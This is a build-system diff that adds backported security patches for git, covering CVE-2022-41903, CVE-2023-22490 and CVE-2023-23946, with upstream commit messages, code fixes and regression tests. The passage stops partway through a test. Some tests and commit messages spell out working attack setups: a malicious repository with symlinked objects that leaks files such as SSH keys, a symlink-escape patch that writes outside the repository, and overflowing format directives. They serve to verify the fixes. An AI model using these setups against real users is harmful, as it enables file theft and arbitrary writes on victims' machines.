+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-11.patch
@@ -0,0 +1,90 @@
+From f930a2394303b902e2973f4308f96529f736b8bc Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:47:15 +0100
+Subject: [PATCH 11/12] utf8: refactor strbuf_utf8_replace to not rely on preallocated buffer
+
+In `strbuf_utf8_replace`, we preallocate the destination buffer and then
+use `memcpy` to copy bytes into it at computed offsets. This feels
+rather fragile and is hard to understand at times. Refactor the code to
+instead use `strbuf_add` and `strbuf_addstr` so that we can be sure that
+there is no possibility to perform an out-of-bounds write.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/f930a2394303b902e2973f4308f96529f736b8bc]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ utf8.c | 34 +++++++++++++---------------------
+ 1 file changed, 13 insertions(+), 21 deletions(-)
+
+diff --git a/utf8.c b/utf8.c
+index ec03e69..a13f5e3 100644
+--- a/utf8.c
++++ b/utf8.c
+@@ -365,26 +365,20 @@ void strbuf_add_wrapped_bytes(struct strbuf *buf, const char *data, int len,
+ void strbuf_utf8_replace(struct strbuf *sb_src, int pos, int width,
+ 			 const char *subst)
+ {
+-	struct strbuf sb_dst = STRBUF_INIT;
+-	char *src = sb_src->buf;
+-	char *end = src + sb_src->len;
+-	char *dst;
+-	int w = 0, subst_len = 0;
++	const char *src = sb_src->buf, *end = sb_src->buf + sb_src->len;
++	struct strbuf dst;
++	int w = 0;
+ 
+-	if (subst)
+-		subst_len = strlen(subst);
+-	strbuf_grow(&sb_dst, sb_src->len + subst_len);
+-	dst = sb_dst.buf;
++	strbuf_init(&dst, sb_src->len);
+ 
+ 	while (src < end) {
++		const char *old;
+ 		int glyph_width;
+-		char *old;
+ 		size_t n;
+ 
+ 		while ((n = display_mode_esc_sequence_len(src))) {
+-			memcpy(dst, src, n);
++			strbuf_add(&dst, src, n);
+ 			src += n;
+-			dst += n;
+ 		}
+ 
+ 		if (src >= end)
+@@ -404,21 +398,19 @@ void strbuf_utf8_replace(struct strbuf *sb_src, int pos, int width,
+ 
+ 		if (glyph_width && w >= pos && w < pos + width) {
+ 			if (subst) {
+-				memcpy(dst, subst, subst_len);
+-				dst += subst_len;
++				strbuf_addstr(&dst, subst);
+ 				subst = NULL;
+ 			}
+-			w += glyph_width;
+-			continue;
++		} else {
++			strbuf_add(&dst, old, src - old);
+ 		}
+-		memcpy(dst, old, src - old);
+-		dst += src - old;
++
+ 		w += glyph_width;
+ 	}
+-	strbuf_setlen(&sb_dst, dst - sb_dst.buf);
+-	strbuf_swap(sb_src, &sb_dst);
++
++	strbuf_swap(sb_src, &dst);
+ out:
+-	strbuf_release(&sb_dst);
++	strbuf_release(&dst);
+ }
+ 
+ /*
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-12.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-12.patch
new file mode 100644
index 0000000000..978865978d
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-12.patch
@@ -0,0 +1,124 @@
+From 304a50adff6480ede46b68f7545baab542cbfb46 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:47:23 +0100
+Subject: [PATCH 12/12] pretty: restrict input lengths for padding and wrapping formats
+
+Both the padding and wrapping formatting directives allow the caller to
+specify an integer that ultimately leads to us adding this many chars to
+the result buffer. As a consequence, it is trivial to e.g. allocate 2GB
+of RAM via a single formatting directive and cause resource exhaustion
+on the machine executing this logic. Furthermore, it is debatable
+whether there are any sane usecases that require the user to pad data to
+2GB boundaries or to indent wrapped data by 2GB.
+
+Restrict the input sizes to 16 kilobytes at a maximum to limit the
+amount of bytes that can be requested by the user. This is not meant
+as a fix because there are ways to trivially amplify the amount of
+data we generate via formatting directives; the real protection is
+achieved by the changes in previous steps to catch and avoid integer
+wraparound that causes us to under-allocate and access beyond the
+end of allocated memory reagions. But having such a limit
+significantly helps fuzzing the pretty format, because the fuzzer is
+otherwise quite fast to run out-of-memory as it discovers these
+formatters.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/304a50adff6480ede46b68f7545baab542cbfb46]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ pretty.c                      | 26 ++++++++++++++++++++++++++
+ t/t4205-log-pretty-formats.sh | 24 +++++++++++++++---------
+ 2 files changed, 41 insertions(+), 9 deletions(-)
+
+diff --git a/pretty.c b/pretty.c
+index c3c1443..e9687f0 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -13,6 +13,13 @@
+ #include "gpg-interface.h"
+ #include "trailer.h"
+ 
++/*
++ * The limit for formatting directives, which enable the caller to append
++ * arbitrarily many bytes to the formatted buffer. This includes padding
++ * and wrapping formatters.
++ */
++#define FORMATTING_LIMIT (16 * 1024)
++
+ static char *user_format;
+ static struct cmt_fmt_map {
+ 	const char *name;
+@@ -1029,6 +1036,15 @@ static size_t parse_padding_placeholder(const char *placeholder,
+ 		if (!*end || end == start)
+ 			return 0;
+ 		width = strtol(start, &next, 10);
++
++		/*
++		 * We need to limit the amount of padding, or otherwise this
++		 * would allow the user to pad the buffer by arbitrarily many
++		 * bytes and thus cause resource exhaustion.
++		 */
++		if (width < -FORMATTING_LIMIT || width > FORMATTING_LIMIT)
++			return 0;
++
+ 		if (next == start || width == 0)
+ 			return 0;
+ 		if (width < 0) {
+@@ -1188,6 +1204,16 @@ static size_t format_commit_one(struct strbuf *sb, /* in UTF-8 */
+ 				if (*next != ')')
+ 					return 0;
+ 			}
++
++			/*
++			 * We need to limit the format here as it allows the
++			 * user to prepend arbitrarily many bytes to the buffer
++			 * when rewrapping.
++			 */
++			if (width > FORMATTING_LIMIT ||
++			    indent1 > FORMATTING_LIMIT ||
++			    indent2 > FORMATTING_LIMIT)
++				return 0;
+ 			rewrap_message_tail(sb, c, width, indent1, indent2);
+ 			return end - placeholder + 1;
+ 		} else
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index 52c8bc8..572d02f 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -809,15 +809,21 @@ test_expect_success 'log --pretty with magical wrapping directives' '
+ '
+ 
+ test_expect_success SIZE_T_IS_64BIT 'log --pretty with overflowing wrapping directive' '
+-	cat >expect <<-EOF &&
+-	fatal: number too large to represent as int on this platform: 2147483649
+-	EOF
+-	test_must_fail git log -1 --pretty="format:%w(2147483649,1,1)%d" 2>error &&
+-	test_cmp expect error &&
+-	test_must_fail git log -1 --pretty="format:%w(1,2147483649,1)%d" 2>error &&
+-	test_cmp expect error &&
+-	test_must_fail git log -1 --pretty="format:%w(1,1,2147483649)%d" 2>error &&
+-	test_cmp expect error
++	printf "%%w(2147483649,1,1)0" >expect &&
++	git log -1 --pretty="format:%w(2147483649,1,1)%x30" >actual &&
++	test_cmp expect actual &&
++	printf "%%w(1,2147483649,1)0" >expect &&
++	git log -1 --pretty="format:%w(1,2147483649,1)%x30" >actual &&
++	test_cmp expect actual &&
++	printf "%%w(1,1,2147483649)0" >expect &&
++	git log -1 --pretty="format:%w(1,1,2147483649)%x30" >actual &&
++	test_cmp expect actual
++'
++
++test_expect_success SIZE_T_IS_64BIT 'log --pretty with overflowing padding directive' '
++	printf "%%<(2147483649)0" >expect &&
++	git log -1 --pretty="format:%<(2147483649)%x30" >actual &&
++	test_cmp expect actual
+ '
+ 
+ test_expect_success 'log --pretty with padding and preceding control chars' '
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2023-22490-1.patch b/meta/recipes-devtools/git/files/CVE-2023-22490-1.patch
new file mode 100644
index 0000000000..cc9b448c5c
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-22490-1.patch
@@ -0,0 +1,179 @@
+From 58325b93c5b6212697b088371809e9948fee8052 Mon Sep 17 00:00:00 2001
+From: Taylor Blau <me@ttaylorr.com>
+Date: Tue, 24 Jan 2023 19:43:45 -0500
+Subject: [PATCH 1/3] t5619: demonstrate clone_local() with ambiguous transport
+
+When cloning a repository, Git must determine (a) what transport
+mechanism to use, and (b) whether or not the clone is local.
+
+Since f38aa83 (use local cloning if insteadOf makes a local URL,
+2014-07-17), the latter check happens after the remote has been
+initialized, and references the remote's URL instead of the local path.
+This is done to make it possible for a `url.<base>.insteadOf` rule to
+convert a remote URL into a local one, in which case the `clone_local()`
+mechanism should be used.
+
+However, with a specially crafted repository, Git can be tricked into
+using a non-local transport while still setting `is_local` to "1" and
+using the `clone_local()` optimization. The below test case
+demonstrates such an instance, and shows that it can be used to include
+arbitrary (known) paths in the working copy of a cloned repository on a
+victim's machine[^1], even if local file clones are forbidden by
+`protocol.file.allow`.
+
+This happens in a few parts:
+
+ 1. We first call `get_repo_path()` to see if the remote is a local
+    path. If it is, we replace the repo name with its absolute path.
+
+ 2. We then call `transport_get()` on the repo name and decide how to
+    access it. If it was turned into an absolute path in the previous
+    step, then we should always treat it like a file.
+
+ 3. We use `get_repo_path()` again, and set `is_local` as appropriate.
+    But it's already too late to rewrite the repo name as an absolute
+    path, since we've already fed it to the transport code.
+
+The attack works by including a submodule whose URL corresponds to a
+path on disk. In the below example, the repository "sub" is reachable
+via the dumb HTTP protocol at (something like):
+
+    http://127.0.0.1:NNNN/dumb/sub.git
+
+However, the path "http:/127.0.0.1:NNNN/dumb" (that is, a top-level
+directory called "http:", then nested directories "127.0.0.1:NNNN", and
+"dumb") exists within the repository, too.
+
+To determine this, it first picks the appropriate transport, which is
+dumb HTTP. It then uses the remote's URL in order to determine whether
+the repository exists locally on disk. However, the malicious repository
+also contains an embedded stub repository which is the target of a
+symbolic link at the local path corresponding to the "sub" repository on
+disk (i.e., there is a symbolic link at "http:/127.0.0.1/dumb/sub.git",
+pointing to the stub repository via ".git/modules/sub/../../../repo").
+
+This stub repository fools Git into thinking that a local repository
+exists at that URL and thus can be cloned locally. The affected call is
+in `get_repo_path()`, which in turn calls `get_repo_path_1()`, which
+locates a valid repository at that target.
+
+This then causes Git to set the `is_local` variable to "1", and in turn
+instructs Git to clone the repository using its local clone optimization
+via the `clone_local()` function.
+
+The exploit comes into play because the stub repository's top-level
+"$GIT_DIR/objects" directory is a symbolic link which can point to an
+arbitrary path on the victim's machine. `clone_local()` resolves the
+top-level "objects" directory through a `stat(2)` call, meaning that we
+read through the symbolic link and copy or hardlink the directory
+contents at the destination of the link.
+
+In other words, we can get steps (1) and (3) to disagree by leveraging
+the dangling symlink to pick a non-local transport in the first step,
+and then set is_local to "1" in the third step when cloning with
+`--separate-git-dir`, which makes the symlink non-dangling.
+
+This can result in data-exfiltration on the victim's machine when
+sensitive data is at a known path (e.g., "/home/$USER/.ssh").
+
+The appropriate fix is two-fold:
+
+ - Resolve the transport later on (to avoid using the local
+   clone optimization with a non-local transport).
+
+ - Avoid reading through the top-level "objects" directory when
+   (correctly) using the clone_local() optimization.
+
+This patch merely demonstrates the issue. The following two patches will
+implement each part of the above fix, respectively.
+
+[^1]: Provided that any target directory does not contain symbolic
+  links, in which case the changes from 6f054f9 (builtin/clone.c:
+  disallow `--local` clones with symlinks, 2022-07-28) will abort the
+  clone.
+
+Reported-by: yvvdwf <yvvdwf@gmail.com>
+Signed-off-by: Taylor Blau <me@ttaylorr.com>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport
+[https://github.com/git/git/commit/58325b93c5b6212697b088371809e9948fee8052]
+CVE: CVE-2023-22490
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ t/t5619-clone-local-ambiguous-transport.sh | 63 ++++++++++++++++++++++
+ 1 file changed, 63 insertions(+)
+ create mode 100644 t/t5619-clone-local-ambiguous-transport.sh
+
+diff --git a/t/t5619-clone-local-ambiguous-transport.sh b/t/t5619-clone-local-ambiguous-transport.sh
+new file mode 100644
+index 0000000..7ebd31a
+--- /dev/null
++++ b/t/t5619-clone-local-ambiguous-transport.sh
+@@ -0,0 +1,63 @@
++#!/bin/sh
++
++test_description='test local clone with ambiguous transport'
++
++. ./test-lib.sh
++. "$TEST_DIRECTORY/lib-httpd.sh"
++
++if ! test_have_prereq SYMLINKS
++then
++	skip_all='skipping test, symlink support unavailable'
++	test_done
++fi
++
++start_httpd
++
++REPO="$HTTPD_DOCUMENT_ROOT_PATH/sub.git"
++URI="$HTTPD_URL/dumb/sub.git"
++
++test_expect_success 'setup' '
++	mkdir -p sensitive &&
++	echo "secret" >sensitive/secret &&
++
++	git init --bare "$REPO" &&
++	test_commit_bulk -C "$REPO" --ref=main 1 &&
++
++	git -C "$REPO" update-ref HEAD main &&
++	git -C "$REPO" update-server-info &&
++
++	git init malicious &&
++	(
++		cd malicious &&
++
++		git submodule add "$URI" &&
++
++		mkdir -p repo/refs &&
++		touch repo/refs/.gitkeep &&
++		printf "ref: refs/heads/a" >repo/HEAD &&
++		ln -s "$(cd .. && pwd)/sensitive" repo/objects &&
++
++		mkdir -p "$HTTPD_URL/dumb" &&
++		ln -s "../../../.git/modules/sub/../../../repo/" "$URI" &&
++
++		git add . &&
++		git commit -m "initial commit"
++	) &&
++
++	# Delete all of the references in our malicious submodule to
++	# avoid the client attempting to checkout any objects (which
++	# will be missing, and thus will cause the clone to fail before
++	# we can trigger the exploit).
++	git -C "$REPO" for-each-ref --format="delete %(refname)" >in &&
++	git -C "$REPO" update-ref --stdin <in &&
++	git -C "$REPO" update-server-info
++'
++
++test_expect_failure 'ambiguous transport does not lead to arbitrary file-inclusion' '
++	git clone malicious clone &&
++	git -C clone submodule update --init &&
++
++	test_path_is_missing clone/.git/modules/sub/objects/secret
++'
++
++test_done
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2023-22490-2.patch b/meta/recipes-devtools/git/files/CVE-2023-22490-2.patch
new file mode 100644
index 0000000000..0b5b40f827
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-22490-2.patch
@@ -0,0 +1,122 @@
+From cf8f6ce02a13f4d1979a53241afbee15a293fce9 Mon Sep 17 00:00:00 2001
+From: Taylor Blau <me@ttaylorr.com>
+Date: Tue, 24 Jan 2023 19:43:48 -0500
+Subject: [PATCH 2/3] clone: delay picking a transport until after get_repo_path()
+
+In the previous commit, t5619 demonstrates an issue where two calls to
+`get_repo_path()` could trick Git into using its local clone mechanism
+in conjunction with a non-local transport.
+
+That sequence is:
+
+ - the starting state is that the local path https:/example.com/foo is a
+   symlink that points to ../../../.git/modules/foo. So it's dangling.
+
+ - get_repo_path() sees that no such path exists (because it's
+   dangling), and thus we do not canonicalize it into an absolute path
+
+ - because we're using --separate-git-dir, we create .git/modules/foo.
+   Now our symlink is no longer dangling!
+
+ - we pass the url to transport_get(), which sees it as an https URL.
+
+ - we call get_repo_path() again, on the url. This second call was
+   introduced by f38aa83 (use local cloning if insteadOf makes a
+   local URL, 2014-07-17). The idea is that we want to pull the url
+   fresh from the remote.c API, because it will apply any aliases.
+
+And of course now it sees that there is a local file, which is a
+mismatch with the transport we already selected.
+
+The issue in the above sequence is calling `transport_get()` before
+deciding whether or not the repository is indeed local, and not passing
+in an absolute path if it is local.
+
+This is reminiscent of a similar bug report in [1], where it was
+suggested to perform the `insteadOf` lookup earlier. Taking that
+approach may not be as straightforward, since the intent is to store the
+original URL in the config, but to actually fetch from the insteadOf
+one, so conflating the two early on is a non-starter.
+
+Note: we pass the path returned by `get_repo_path(remote->url[0])`,
+which should be the same as `repo_name` (aside from any `insteadOf`
+rewrites).
+
+We *could* pass `absolute_pathdup()` of the same argument, which
+86521ac (Bring local clone's origin URL in line with that of a remote
+clone, 2008-09-01) indicates may differ depending on the presence of
+".git/" for a non-bare repo. That matters for forming relative submodule
+paths, but doesn't matter for the second call, since we're just feeding
+it to the transport code, which is fine either way.
+
+[1]: https://lore.kernel.org/git/CAMoD=Bi41mB3QRn3JdZL-FGHs4w3C2jGpnJB-CqSndO7FMtfzA@mail.gmail.com/
+
+Signed-off-by: Jeff King <peff@peff.net>
+Signed-off-by: Taylor Blau <me@ttaylorr.com>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport
+[https://github.com/git/git/commit/cf8f6ce02a13f4d1979a53241afbee15a293fce9]
+CVE: CVE-2023-22490
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ builtin/clone.c                            |  8 ++++----
+ t/t5619-clone-local-ambiguous-transport.sh | 15 +++++++++++----
+ 2 files changed, 15 insertions(+), 8 deletions(-)
+
+diff --git a/builtin/clone.c b/builtin/clone.c
+index 53e04b1..b57e703 100644
+--- a/builtin/clone.c
++++ b/builtin/clone.c
+@@ -1112,10 +1112,6 @@ int cmd_clone(int argc, const char **argv, const char *prefix)
+ 		    branch_top.buf);
+ 	refspec_append(&remote->fetch, default_refspec.buf);
+ 
+-	transport = transport_get(remote, remote->url[0]);
+-	transport_set_verbosity(transport, option_verbosity, option_progress);
+-	transport->family = family;
+-
+ 	path = get_repo_path(remote->url[0], &is_bundle);
+ 	is_local = option_local != 0 && path && !is_bundle;
+ 	if (is_local) {
+@@ -1135,6 +1131,10 @@ int cmd_clone(int argc, const char **argv, const char *prefix)
+ 	}
+ 	if (option_local > 0 && !is_local)
+ 		warning(_("--local is ignored"));
++
++	transport = transport_get(remote, path ? path : remote->url[0]);
++	transport_set_verbosity(transport, option_verbosity, option_progress);
++	transport->family = family;
+ 	transport->cloning = 1;
+ 
+ 	transport_set_option(transport, TRANS_OPT_KEEP, "yes");
+diff --git a/t/t5619-clone-local-ambiguous-transport.sh b/t/t5619-clone-local-ambiguous-transport.sh
+index 7ebd31a..cce62bf 100644
+--- a/t/t5619-clone-local-ambiguous-transport.sh
++++ b/t/t5619-clone-local-ambiguous-transport.sh
+@@ -53,11 +53,18 @@ test_expect_success 'setup' '
+ 	git -C "$REPO" update-server-info
+ '
+ 
+-test_expect_failure 'ambiguous transport does not lead to arbitrary file-inclusion' '
++test_expect_success 'ambiguous transport does not lead to arbitrary file-inclusion' '
+ 	git clone malicious clone &&
+-	git -C clone submodule update --init &&
+-
+-	test_path_is_missing clone/.git/modules/sub/objects/secret
++	test_must_fail git -C clone submodule update --init 2>err &&
++
++	test_path_is_missing clone/.git/modules/sub/objects/secret &&
++	# We would actually expect "transport .file. not allowed" here,
++	# but due to quirks of the URL detection in Git, we mis-parse
++	# the absolute path as a bogus URL and die before that step.
++	#
++	# This works for now, and if we ever fix the URL detection, it
++	# is OK to change this to detect the transport error.
++	grep "protocol .* is not supported" err
+ '
+ 
+ test_done
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2023-22490-3.patch b/meta/recipes-devtools/git/files/CVE-2023-22490-3.patch
new file mode 100644
index 0000000000..08fb7f840b
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-22490-3.patch
@@ -0,0 +1,154 @@
+From bffc762f87ae8d18c6001bf0044a76004245754c Mon Sep 17 00:00:00 2001
+From: Taylor Blau <me@ttaylorr.com>
+Date: Tue, 24 Jan 2023 19:43:51 -0500
+Subject: [PATCH 3/3] dir-iterator: prevent top-level symlinks without FOLLOW_SYMLINKS
+
+When using the dir_iterator API, we first stat(2) the base path, and
+then use that as a starting point to enumerate the directory's contents.
+
+If the directory contains symbolic links, we will immediately die() upon
+encountering them without the `FOLLOW_SYMLINKS` flag. The same is not
+true when resolving the top-level directory, though.
+
+As explained in a previous commit, this oversight in 6f054f9
+(builtin/clone.c: disallow `--local` clones with symlinks, 2022-07-28)
+can be used as an attack vector to include arbitrary files on a victim's
+filesystem from outside of the repository.
+
+Prevent resolving top-level symlinks unless the FOLLOW_SYMLINKS flag is
+given, which will cause clones of a repository with a symlink'd
+"$GIT_DIR/objects" directory to fail.
+
+Signed-off-by: Taylor Blau <me@ttaylorr.com>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport
+[https://github.com/git/git/commit/bffc762f87ae8d18c6001bf0044a76004245754c]
+CVE: CVE-2023-22490
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dir-iterator.c             | 13 +++++++++----
+ dir-iterator.h             |  5 +++++
+ t/t0066-dir-iterator.sh    | 27 ++++++++++++++++++++++++++-
+ t/t5604-clone-reference.sh | 16 ++++++++++++++++
+ 4 files changed, 56 insertions(+), 5 deletions(-)
+
+diff --git a/dir-iterator.c b/dir-iterator.c
+index b17e9f9..3764dd8 100644
+--- a/dir-iterator.c
++++ b/dir-iterator.c
+@@ -203,7 +203,7 @@ struct dir_iterator *dir_iterator_begin(const char *path, unsigned int flags)
+ {
+ 	struct dir_iterator_int *iter = xcalloc(1, sizeof(*iter));
+ 	struct dir_iterator *dir_iterator = &iter->base;
+-	int saved_errno;
++	int saved_errno, err;
+ 
+ 	strbuf_init(&iter->base.path, PATH_MAX);
+ 	strbuf_addstr(&iter->base.path, path);
+@@ -213,10 +213,15 @@ struct dir_iterator *dir_iterator_begin(const char *path, unsigned int flags)
+ 	iter->flags = flags;
+ 
+ 	/*
+-	 * Note: stat already checks for NULL or empty strings and
+-	 * inexistent paths.
++	 * Note: stat/lstat already checks for NULL or empty strings and
++	 * nonexistent paths.
+ 	 */
+-	if (stat(iter->base.path.buf, &iter->base.st) < 0) {
++	if (iter->flags & DIR_ITERATOR_FOLLOW_SYMLINKS)
++		err = stat(iter->base.path.buf, &iter->base.st);
++	else
++		err = lstat(iter->base.path.buf, &iter->base.st);
++
++	if (err < 0) {
+ 		saved_errno = errno;
+ 		goto error_out;
+ 	}
+diff --git a/dir-iterator.h b/dir-iterator.h
+index 0822915..e3b6ff2 100644
+--- a/dir-iterator.h
++++ b/dir-iterator.h
+@@ -61,6 +61,11 @@
+  *   not the symlinks themselves, which is the default behavior. Broken
+  *   symlinks are ignored.
+  *
++ *   Note: setting DIR_ITERATOR_FOLLOW_SYMLINKS affects resolving the
++ *   starting path as well (e.g., attempting to iterate starting at a
++ *   symbolic link pointing to a directory without FOLLOW_SYMLINKS will
++ *   result in an error).
++ *
+  * Warning: circular symlinks are also followed when
+  * DIR_ITERATOR_FOLLOW_SYMLINKS is set. The iteration may end up with
+  * an ELOOP if they happen and DIR_ITERATOR_PEDANTIC is set.
+diff --git a/t/t0066-dir-iterator.sh b/t/t0066-dir-iterator.sh
+index 92910e4..c826f60 100755
+--- a/t/t0066-dir-iterator.sh
++++ b/t/t0066-dir-iterator.sh
+@@ -109,7 +109,9 @@ test_expect_success SYMLINKS 'setup dirs with symlinks' '
+ 	mkdir -p dir5/a/c &&
+ 	ln -s ../c dir5/a/b/d &&
+ 	ln -s ../ dir5/a/b/e &&
+-	ln -s ../../ dir5/a/b/f
++	ln -s ../../ dir5/a/b/f &&
++
++	ln -s dir4 dir6
+ '
+ 
+ test_expect_success SYMLINKS 'dir-iterator should not follow symlinks by default' '
+@@ -145,4 +147,27 @@ test_expect_success SYMLINKS 'dir-iterator should follow symlinks w/ follow flag
+ 	test_cmp expected-follow-sorted-output actual-follow-sorted-output
+ '
+ 
++test_expect_success SYMLINKS 'dir-iterator does not resolve top-level symlinks' '
++	test_must_fail test-tool dir-iterator ./dir6 >out &&
++
++	grep "ENOTDIR" out
++'
++
++test_expect_success SYMLINKS 'dir-iterator resolves top-level symlinks w/ follow flag' '
++	cat >expected-follow-sorted-output <<-EOF &&
++	[d] (a) [a] ./dir6/a
++	[d] (a/f) [f] ./dir6/a/f
++	[d] (a/f/c) [c] ./dir6/a/f/c
++	[d] (b) [b] ./dir6/b
++	[d] (b/c) [c] ./dir6/b/c
++	[f] (a/d) [d] ./dir6/a/d
++	[f] (a/e) [e] ./dir6/a/e
++	EOF
++
++	test-tool dir-iterator --follow-symlinks ./dir6 >out &&
++	sort out >actual-follow-sorted-output &&
++
++	test_cmp expected-follow-sorted-output actual-follow-sorted-output
++'
++
+ test_done
+diff --git a/t/t5604-clone-reference.sh b/t/t5604-clone-reference.sh
+index 4894237..615b981 100755
+--- a/t/t5604-clone-reference.sh
++++ b/t/t5604-clone-reference.sh
+@@ -354,4 +354,20 @@ test_expect_success SYMLINKS 'clone repo with symlinked or unknown files at obje
+ 	test_must_be_empty T--shared.objects-symlinks.raw
+ '
+ 
++test_expect_success SYMLINKS 'clone repo with symlinked objects directory' '
++	test_when_finished "rm -fr sensitive malicious" &&
++
++	mkdir -p sensitive &&
++	echo "secret" >sensitive/file &&
++
++	git init malicious &&
++	rm -fr malicious/.git/objects &&
++	ln -s "$(pwd)/sensitive" ./malicious/.git/objects &&
++
++	test_must_fail git clone --local malicious clone 2>err &&
++
++	test_path_is_missing clone &&
++	grep "failed to start iterator over" err
++'
++
+ test_done
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2023-23946.patch b/meta/recipes-devtools/git/files/CVE-2023-23946.patch
new file mode 100644
index 0000000000..3629ff57b2
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-23946.patch
@@ -0,0 +1,184 @@
+From fade728df1221598f42d391cf377e9e84a32053f Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 2 Feb 2023 11:54:34 +0100
+Subject: [PATCH] apply: fix writing behind newly created symbolic links
+
+When writing files git-apply(1) initially makes sure that none of the
+files it is about to create are behind a symlink:
+
+```
+ $ git init repo
+ Initialized empty Git repository in /tmp/repo/.git/
+ $ cd repo/
+ $ ln -s dir symlink
+ $ git apply - <<EOF
+ diff --git a/symlink/file b/symlink/file
+ new file mode 100644
+ index 0000000..e69de29
+ EOF
+ error: affected file 'symlink/file' is beyond a symbolic link
+```
+
+This safety mechanism is crucial to ensure that we don't write outside
+of the repository's working directory. It can be fooled though when the
+patch that is being applied creates the symbolic link in the first
+place, which can lead to writing files in arbitrary locations.
+
+Fix this by checking whether the path we're about to create is
+beyond a symlink or not. Tightening these checks like this should be
+fine as we already have these precautions in Git as explained
+above. Ideally, we should update the check we do up-front before
+starting to reflect the computed changes to the working tree so that
+we catch this case as well, but as part of embargoed security work,
+adding an equivalent check just before we try to write out a file
+should serve us well as a reasonable first step.
+
+Digging back into history shows that this vulnerability has existed
+since at least Git v2.9.0. As Git v2.8.0 and older don't build on my
+system anymore I cannot tell whether older versions are affected, as
+well.
+
+Reported-by: Joern Schneeweisz <jschneeweisz@gitlab.com>
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport
+[https://github.com/git/git/commit/fade728df1221598f42d391cf377e9e84a32053f]
+CVE: CVE-2023-23946
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ apply.c                  | 27 ++++++++++++++
+ t/t4115-apply-symlink.sh | 81 ++++++++++++++++++++++++++++++++++++++++
+ 2 files changed, 108 insertions(+)
+
+diff --git a/apply.c b/apply.c
+index f8a046a..4f303bf 100644
+--- a/apply.c
++++ b/apply.c
+@@ -4373,6 +4373,33 @@ static int create_one_file(struct apply_state *state,
+ 	if (state->cached)
+ 		return 0;
+ 
++	/*
++	 * We already try to detect whether files are beyond a symlink in our
++	 * up-front checks. But in the case where symlinks are created by any
++	 * of the intermediate hunks it can happen that our up-front checks
++	 * didn't yet see the symlink, but at the point of arriving here there
++	 * in fact is one. We thus repeat the check for symlinks here.
++	 *
++	 * Note that this does not make the up-front check obsolete as the
++	 * failure mode is different:
++	 *
++	 * - The up-front checks cause us to abort before we have written
++	 *   anything into the working directory. So when we exit this way the
++	 *   working directory remains clean.
++	 *
++	 * - The checks here happen in the middle of the action where we have
++	 *   already started to apply the patch. The end result will be a dirty
++	 *   working directory.
++	 *
++	 * Ideally, we should update the up-front checks to catch what would
++	 * happen when we apply the patch before we damage the working tree.
++	 * We have all the information necessary to do so.  But for now, as a
++	 * part of embargoed security work, having this check would serve as a
++	 * reasonable first step.
++	 */
++	if (path_is_beyond_symlink(state, path))
++		return error(_("affected file '%s' is beyond a symbolic link"), path);
++
+ 	res = try_create_file(state, path, mode, buf, size);
+ 	if (res < 0)
+ 		return -1;
+diff --git a/t/t4115-apply-symlink.sh b/t/t4115-apply-symlink.sh
+index 872fcda..1acb7b2 100755
+--- a/t/t4115-apply-symlink.sh
++++ b/t/t4115-apply-symlink.sh
+@@ -44,4 +44,85 @@ test_expect_success 'apply --index symlink patch' '
+ 
+ '
+ 
++test_expect_success 'symlink setup' '
++	ln -s .git symlink &&
++	git add symlink &&
++	git commit -m "add symlink"
++'
++
++test_expect_success SYMLINKS 'symlink escape when creating new files' '
++	test_when_finished "git reset --hard && git clean -dfx" &&
++
++	cat >patch <<-EOF &&
++	diff --git a/symlink b/renamed-symlink
++	similarity index 100%
++	rename from symlink
++	rename to renamed-symlink
++	--
++	diff --git /dev/null b/renamed-symlink/create-me
++	new file mode 100644
++	index 0000000..039727e
++	--- /dev/null
++	+++ b/renamed-symlink/create-me
++	@@ -0,0 +1,1 @@
++	+busted
++	EOF
++
++	test_must_fail git apply patch 2>stderr &&
++	cat >expected_stderr <<-EOF &&
++	error: affected file ${SQ}renamed-symlink/create-me${SQ} is beyond a symbolic link
++	EOF
++	test_cmp expected_stderr stderr &&
++	! test_path_exists .git/create-me
++'
++
++test_expect_success SYMLINKS 'symlink escape when modifying file' '
++	test_when_finished "git reset --hard && git clean -dfx" &&
++	touch .git/modify-me &&
++
